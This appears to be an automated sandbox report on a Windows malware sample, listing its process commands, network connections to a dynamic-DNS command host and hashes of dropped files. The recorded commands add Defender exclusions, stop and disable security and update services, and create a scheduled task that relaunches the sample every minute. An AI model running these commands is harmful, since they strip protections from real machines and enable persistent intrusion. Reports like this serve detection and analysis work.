"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /Delete /tn NYAN /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2320 -ip 2320

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2320 -s 1756

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn NYAN /tr "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" /sc minute /mo 1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout 1

C:\Windows\SysWOW64\timeout.exe

timeout 1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 868 -ip 868

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 868 -s 1852

C:\Windows\SysWOW64\schtasks.exe

schtasks /Delete /tn NYAN /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn NYAN /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" /sc minute /mo 1

C:\Windows\EdgeBrowser.exe

"C:\Windows\EdgeBrowser.exe"

C:\Windows\system32\sc.exe

sc stop windefend

C:\Windows\system32\sc.exe

sc config SecurityHealthService start= disabled

C:\Windows\system32\sc.exe

sc stop WdiSystemHost

C:\Windows\system32\sc.exe

sc config InstallService Start= disabled

C:\Windows\system32\sc.exe

sc stop InstallService

C:\Windows\system32\sc.exe

sc config WdiSystemHost start= disabled

C:\Windows\system32\sc.exe

sc config WdiServiceHost start= disabled

C:\Windows\system32\sc.exe

sc stop WdiServiceHost

C:\Windows\system32\sc.exe

sc config wscsvc start= disabled

C:\Windows\system32\sc.exe

sc stop wscsvc

C:\Windows\system32\sc.exe

sc config SDRSVC start= disabled

C:\Windows\system32\sc.exe

sc stop SDRSVC

C:\Windows\system32\sc.exe

sc stop SecurityHealthService

C:\Windows\system32\sc.exe

sc config WaasMedicSvc start= disabled

C:\Windows\system32\sc.exe

sc stop WaasMedicSvc

C:\Windows\system32\sc.exe

sc config usosvc start= disabled

C:\Windows\system32\sc.exe

sc stop usosvc

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc config Sense start= disabled

C:\Windows\system32\sc.exe

sc stop Sense

C:\Windows\system32\sc.exe

sc config windefend start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\test.bat"

C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout 1

C:\Windows\SysWOW64\timeout.exe

timeout 1

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv M0nPrqn9l0uxnPFE5ym+WA.0.2

C:\Windows\EdgeBrowser.exe

"C:\Windows\EdgeBrowser.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3864 -ip 3864

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 1756

C:\Windows\SysWOW64\schtasks.exe

schtasks /Delete /tn NYAN /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn NYAN /tr "C:\Windows\EdgeBrowser.exe" /sc minute /mo 1

C:\Windows\EdgeBrowser.exe

C:\Windows\EdgeBrowser.exe

C:\Users\Admin\AppData\Local\Temp\008d5608-fb82-4b14-a4f4-16aeb5d00930\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\008d5608-fb82-4b14-a4f4-16aeb5d00930\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\008d5608-fb82-4b14-a4f4-16aeb5d00930\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\008d5608-fb82-4b14-a4f4-16aeb5d00930\test.bat"

C:\Windows\system32\sc.exe

sc stop windefend

C:\Windows\system32\sc.exe

sc config windefend start= disabled

C:\Windows\system32\sc.exe

sc stop Sense

C:\Windows\system32\sc.exe

sc config Sense start= disabled

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc stop usosvc

C:\Windows\system32\sc.exe

sc config usosvc start= disabled

C:\Windows\system32\sc.exe

sc stop WaasMedicSvc

C:\Windows\system32\sc.exe

sc config WaasMedicSvc start= disabled

C:\Windows\system32\sc.exe

sc stop SecurityHealthService

C:\Windows\system32\sc.exe

sc config SecurityHealthService start= disabled

C:\Windows\system32\sc.exe

sc stop SDRSVC

C:\Windows\system32\sc.exe

sc config SDRSVC start= disabled

C:\Windows\system32\sc.exe

sc stop wscsvc

C:\Windows\system32\sc.exe

sc config wscsvc start= disabled

C:\Windows\system32\sc.exe

sc stop WdiServiceHost

C:\Windows\system32\sc.exe

sc config WdiServiceHost start= disabled

C:\Windows\system32\sc.exe

sc stop WdiSystemHost

C:\Windows\system32\sc.exe

sc config WdiSystemHost start= disabled

C:\Windows\system32\sc.exe

sc stop InstallService

C:\Windows\system32\sc.exe

sc config InstallService Start= disabled

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout 1

C:\Windows\SysWOW64\timeout.exe

timeout 1

C:\Windows\EdgeBrowser.exe

"C:\Windows\EdgeBrowser.exe"

C:\Windows\EdgeBrowser.exe

"C:\Windows\EdgeBrowser.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3652 -ip 3652

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 908

C:\Windows\SysWOW64\schtasks.exe

schtasks /Delete /tn NYAN /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn NYAN /tr "C:\Windows\EdgeBrowser.exe" /sc minute /mo 1

C:\Windows\EdgeBrowser.exe

C:\Windows\EdgeBrowser.exe

C:\Users\Admin\AppData\Local\Temp\2841dd81-cf01-489d-83c7-652a0936f2d0\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\2841dd81-cf01-489d-83c7-652a0936f2d0\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\2841dd81-cf01-489d-83c7-652a0936f2d0\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2841dd81-cf01-489d-83c7-652a0936f2d0\test.bat"

C:\Windows\system32\sc.exe

sc stop windefend

C:\Windows\system32\sc.exe

sc config windefend start= disabled

C:\Windows\system32\sc.exe

sc stop Sense

C:\Windows\system32\sc.exe

sc config Sense start= disabled

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc stop usosvc

C:\Windows\system32\sc.exe

sc config usosvc start= disabled

C:\Windows\system32\sc.exe

sc stop WaasMedicSvc

C:\Windows\system32\sc.exe

sc config WaasMedicSvc start= disabled

C:\Windows\system32\sc.exe

sc stop SecurityHealthService

C:\Windows\system32\sc.exe

sc config SecurityHealthService start= disabled

C:\Windows\system32\sc.exe

sc stop SDRSVC

C:\Windows\system32\sc.exe

sc config SDRSVC start= disabled

C:\Windows\system32\sc.exe

sc stop wscsvc

C:\Windows\system32\sc.exe

sc config wscsvc start= disabled

C:\Windows\system32\sc.exe

sc stop WdiServiceHost

C:\Windows\system32\sc.exe

sc config WdiServiceHost start= disabled

C:\Windows\system32\sc.exe

sc stop WdiSystemHost

C:\Windows\system32\sc.exe

sc config WdiSystemHost start= disabled

C:\Windows\system32\sc.exe

sc stop InstallService

C:\Windows\system32\sc.exe

sc config InstallService Start= disabled

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout 1

C:\Windows\SysWOW64\timeout.exe

timeout 1

C:\Windows\EdgeBrowser.exe

"C:\Windows\EdgeBrowser.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4380 -ip 4380

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 1604

C:\Windows\SysWOW64\schtasks.exe

schtasks /Delete /tn NYAN /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn NYAN /tr "C:\Windows\EdgeBrowser.exe" /sc minute /mo 1

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 dontreachme3.ddns.net udp
US 216.218.135.118:3604 dontreachme3.ddns.net tcp
US 8.8.8.8:53 118.135.218.216.in-addr.arpa udp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 216.218.135.118:3604 dontreachme3.ddns.net tcp
US 216.218.135.118:3604 dontreachme3.ddns.net tcp
US 216.218.135.118:3604 dontreachme3.ddns.net tcp
US 216.218.135.118:3604 dontreachme3.ddns.net tcp
US 8.8.8.8:53 91.16.208.104.in-addr.arpa udp

Files

memory/2320-0-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/2320-1-0x00000000000D0000-0x00000000003B0000-memory.dmp

memory/2320-2-0x0000000004DC0000-0x0000000004E5C000-memory.dmp

memory/2320-3-0x0000000004D20000-0x0000000004D96000-memory.dmp

memory/2320-4-0x0000000004840000-0x00000000048C0000-memory.dmp

memory/2320-6-0x0000000006220000-0x0000000006230000-memory.dmp

memory/2320-5-0x00000000048C0000-0x00000000048DE000-memory.dmp

memory/2320-7-0x00000000067E0000-0x0000000006D84000-memory.dmp

memory/2320-8-0x0000000006230000-0x00000000062C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe

MD5 17fc12902f4769af3a9271eb4e2dacce
SHA1 9a4a1581cc3971579574f837e110f3bd6d529dab
SHA256 29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512 036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

memory/2896-23-0x0000000000A80000-0x0000000000AB6000-memory.dmp

memory/2896-26-0x0000000004900000-0x0000000004910000-memory.dmp

memory/2896-25-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/2896-28-0x0000000004900000-0x0000000004910000-memory.dmp

memory/2896-27-0x0000000004F40000-0x0000000005568000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe

MD5 730e216d275e35cbb81d3f1b709b228b
SHA1 21b92b5eb008a4eebd3f517b1716bc0851c76721
SHA256 80502885722e2b1e083a55428641eb89be7c40b7aef5eb5c64860c8063238d19
SHA512 02fc645558067f18f43820f79b41ec19d060c8b533cd87fa090693150ca8342efed59d9e6dd75da74c2e3184e330d6ab5fb97b83b4a712dc4507ca76da9a2a88

memory/1376-36-0x00000000745C0000-0x0000000074D70000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe

MD5 75943786884d898bcd0b33357bd0d4f0
SHA1 3224fea4ab0d7d802557d40a7397f62851ace5b2
SHA256 3f4c6c332c7663cb00a26ebf7a96a86158f860c05aab166b14a322cf2756249f
SHA512 4c260f01ce462b7447b466fdd29b0793fdcb87c3767b1606e15465c02b9bda07583cbb4d582e4410a86931854a4ff2dc6822017a2ebebf8615dc89ea85971e5e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe

MD5 715f46ac730dde8d1439d6b78da3050c
SHA1 ea95023b269af1e801286d341ac5499ea34cfd6f
SHA256 c088f887a120770807cc09e3bad4da8a095f53f792bffa3ed751b5dc1c9b9347
SHA512 54821dcc99b4ec5183861ee0ad8ac358d60f29b4c10877df8992e40bc9577cc220ca3f580ed232c232f504aa2127992d4d01703dad5597944baf83c954c4718e

memory/868-40-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/1376-41-0x0000000002520000-0x0000000002530000-memory.dmp

memory/1376-42-0x0000000002520000-0x0000000002530000-memory.dmp

memory/3616-43-0x0000000005310000-0x0000000005320000-memory.dmp

memory/3616-44-0x0000000005310000-0x0000000005320000-memory.dmp

memory/2896-45-0x0000000004D40000-0x0000000004D62000-memory.dmp

memory/4440-47-0x00000000025C0000-0x00000000025D0000-memory.dmp

memory/2896-50-0x0000000005570000-0x00000000055D6000-memory.dmp

memory/1080-51-0x0000000005150000-0x0000000005160000-memory.dmp

memory/2320-49-0x0000000007220000-0x000000000722A000-memory.dmp

memory/4440-48-0x00000000025C0000-0x00000000025D0000-memory.dmp

memory/2896-52-0x00000000055E0000-0x0000000005646000-memory.dmp

memory/1360-54-0x0000000005010000-0x0000000005020000-memory.dmp

memory/1080-53-0x0000000005150000-0x0000000005160000-memory.dmp

memory/2896-55-0x0000000005650000-0x00000000059A4000-memory.dmp

memory/1360-66-0x0000000005010000-0x0000000005020000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p4tf1zle.i5d.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3616-75-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/4440-76-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/1080-77-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/1360-98-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/552-99-0x0000000004980000-0x0000000004990000-memory.dmp

memory/552-105-0x0000000004980000-0x0000000004990000-memory.dmp

memory/320-106-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/320-111-0x0000000000CD0000-0x0000000000CE0000-memory.dmp

memory/552-122-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/868-112-0x0000000006820000-0x0000000006830000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\test.bat

MD5 b2a5ef7d334bdf866113c6f4f9036aae
SHA1 f9027f2827b35840487efd04e818121b5a8541e0
SHA256 27426aa52448e564b5b9dff2dbe62037992ada8336a8e36560cee7a94930c45e
SHA512 8ed39ed39e03fa6d4e49167e8ca4823e47a221294945c141b241cfd1eb7d20314a15608da3fafc3c258ae2cfc535d3e5925b56caceee87acfb7d4831d267189e

memory/1376-151-0x0000000005E40000-0x0000000005E5E000-memory.dmp

memory/2896-152-0x00000000061C0000-0x000000000620C000-memory.dmp

memory/3616-153-0x0000000007670000-0x00000000076A2000-memory.dmp

memory/3616-154-0x000000007FC90000-0x000000007FCA0000-memory.dmp

memory/3616-155-0x000000006F8A0000-0x000000006F8EC000-memory.dmp

memory/1376-170-0x0000000002520000-0x0000000002530000-memory.dmp

memory/1376-171-0x0000000002520000-0x0000000002530000-memory.dmp

memory/2896-158-0x000000006F8A0000-0x000000006F8EC000-memory.dmp

memory/3616-172-0x00000000076C0000-0x0000000007763000-memory.dmp

memory/3616-169-0x0000000007650000-0x000000000766E000-memory.dmp

memory/2320-190-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/2896-191-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/2896-193-0x0000000004900000-0x0000000004910000-memory.dmp

memory/4440-194-0x000000006F8A0000-0x000000006F8EC000-memory.dmp

memory/2320-195-0x0000000006220000-0x0000000006230000-memory.dmp

memory/4440-206-0x000000007F420000-0x000000007F430000-memory.dmp

memory/1376-157-0x000000007EF40000-0x000000007EF50000-memory.dmp

memory/4440-208-0x00000000025C0000-0x00000000025D0000-memory.dmp

memory/1080-210-0x000000006F8A0000-0x000000006F8EC000-memory.dmp

memory/1376-209-0x0000000007190000-0x00000000071AA000-memory.dmp

memory/4440-207-0x00000000025C0000-0x00000000025D0000-memory.dmp

memory/3616-205-0x0000000008070000-0x00000000086EA000-memory.dmp

memory/1376-156-0x000000006F8A0000-0x000000006F8EC000-memory.dmp

memory/5432-304-0x0000000000400000-0x000000000041A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f3ff369ed4627592f38e9d8b56b9860e
SHA1 9bca1801767c963f031a3a086629da99e06afbc7
SHA256 35ac065038538d4ab322bf6d557fb135d1b459ebd151ec50cf6d6166adbf6bb0
SHA512 9054088b3a1393483244325d7cc56939df101b0a279f1e08b4e30db8397f38fbb039458ff23bc33dc11d460445ea8a57be760c06962eed29ef6604fbe05edeac

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2b61613deb3c401d5958654afbf238e4
SHA1 ffa7f35252df7925186f28cd37d0ffb9167ff1ee
SHA256 96dad8750fd7a590a6a4f5cb243ab55e9ea4d9c46bbe797ef2bac168e78f27ff
SHA512 d05f89130a2fbcb5d8ab63eea324edc35cd10a40976b8d0caa0e3c1bf011ac45d45bb4cf8a07fee956cf30550afabee860a5a0299324b65aacf46b787f85f87e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 329952f834379bf2875b4db251d912f3
SHA1 27b4ec4d29d10adb409741320fefe61a3218b5c4
SHA256 8dd5f3fe1a41b95d55dc8b6dcd14dd9fdfbc156d6fc237dceced77c4b3fd1dbd
SHA512 6a4ab97add77f5aabf3ccf03804cdfd30c0dfef3df085819495cb1c6c919f3b3e5627cfe4d0edb765330c8b8280f125f0596a606dc017906f5ae486de80b3f3b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 33ca929e023719ea658483a8003440f3
SHA1 ea074ddf22c609d268937dfbf9890805b998d1f0
SHA256 e070605c605d04fe98743fbb7910808cb9c6653e7d0e644ef7aa7c2959e6685b
SHA512 6e5d11cd83e6f1df12793b648e66b0e457067f83e2893251022c6d3d31521650a9f0d2c4cf3303f142c5cb9597af97fefe7d9738d8d9863957f26105951bcab7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 73627b3a4a23005b8d8a4f44ee956d09
SHA1 d9f48698f83851d6d59cb5db1b2e8d05588125e8
SHA256 825e543611c2dc08f89f4eda465a9df84d050b9594bb2ff745e5cfbd8452626a
SHA512 3c574e508aaa8affd25520d1e0dfc09e0dc49401f63bcf82f96c9c4cedc7152431679aef9be1f820dfdf6774d9a364bfee7c4c7b413edd77b128126ea4ff291a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ee8e51193bb9bd7102bda5424230d274
SHA1 091b226ca758ec2406ccb7b1fee35f52535ded7d
SHA256 2cf262e516568164690da14e3a0ef1ef8d0d9748185eef3a1443969c5d8451c1
SHA512 562c25b7a1e16e62acfc30bb5c8b592a5ee9ce6db7add2dbc91a95bf499abf1adb2cbd9b1116a82faa18b689c12adc040fbc9a320308051170629c6f196058f0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b1ee8842dc4d0a87f5e02577a193efde
SHA1 cbb85515032a6729d728341e5093b81b7b79fb9c
SHA256 72493c1ce10829c803abd37bd10d628722e80014a5c31c6b0dfa050a99b9fbd7
SHA512 d2360f52adf4af4c2862d35a045dc7395baba5dd9357d8ef2d67458604a9bbf18336bcaa2cce92b5a02598ac21cda78377e78b5b4a9b9734cf2f4bc1e4aad4ae

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 76283a739a91052d8e15b06e224886ab
SHA1 e3f575d73ce1ffd954097a5ec05308dbc4c77f26
SHA256 ffdb32151113d42f976eda98773365b61dcce26f909652bf102c3f4177e087b5
SHA512 f853b0d923ef85a2402e034bc77c642de74737ec6f7a09f26d2ee25cb8ef5774e9676c0300b839395690e0ebaf75e7903ade967c07e50662599a390503c66113

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 057819fcfdbf14ab966a39eedafbde4f
SHA1 e20c61d2833f4170c91384f36170c239d3c548ea
SHA256 65d033459b7c49b191298a85776042837322039bbfed517cca7740dcd36f4dfb
SHA512 920ecc541444615127d57074dfcee2e16d7b717a1de53dd6b8ccd8a608d904a4dd81bb392258b64d895dae7e6225339ffbafeecfe5276b7276f577232c011221

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 baae53960a16dc597dd58f7483d0e244
SHA1 1652ebb8d43bdd394477e3ac971164987a8d180f
SHA256 9d04961f6061cafe3ecbe37d17e15f49e912c865534770f6c31d72e1ab5c3489
SHA512 199027fbd5d8cdb8876b397d625656bc7144019f4463655ccd2859099fb581918cc7fa91e08eb58526e3676a0d9e8d2400994f141e89d4c1aae6fe68f945de0b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe

MD5 4f70e8af9ae9f628b8a1b4ddd76d911c
SHA1 505ea25565d741edc020925ead156e6fd7d7487f
SHA256 555e6e85bccacb4db1cde30167bfdca8bcc16392e19031e943cc864d07f8aca3
SHA512 8309c77f724c8e8b81d6486488ca7c01e80c1826c5a50022ac788ddaa31d8b5f9f13b00b480aa7acc1f2595703d6969da681b647855335fdc4ae26eaf7591c81

C:\Windows\EdgeBrowser.exe

MD5 cbca9027b0f391f421bc236ca417848c
SHA1 0d1e83363f5c030c83a746d74a609778e05432a8
SHA256 7d02fbfd3d9b209f24bdd1727a979c1bacf83f5d12a2b618e05c36ba40ff826f
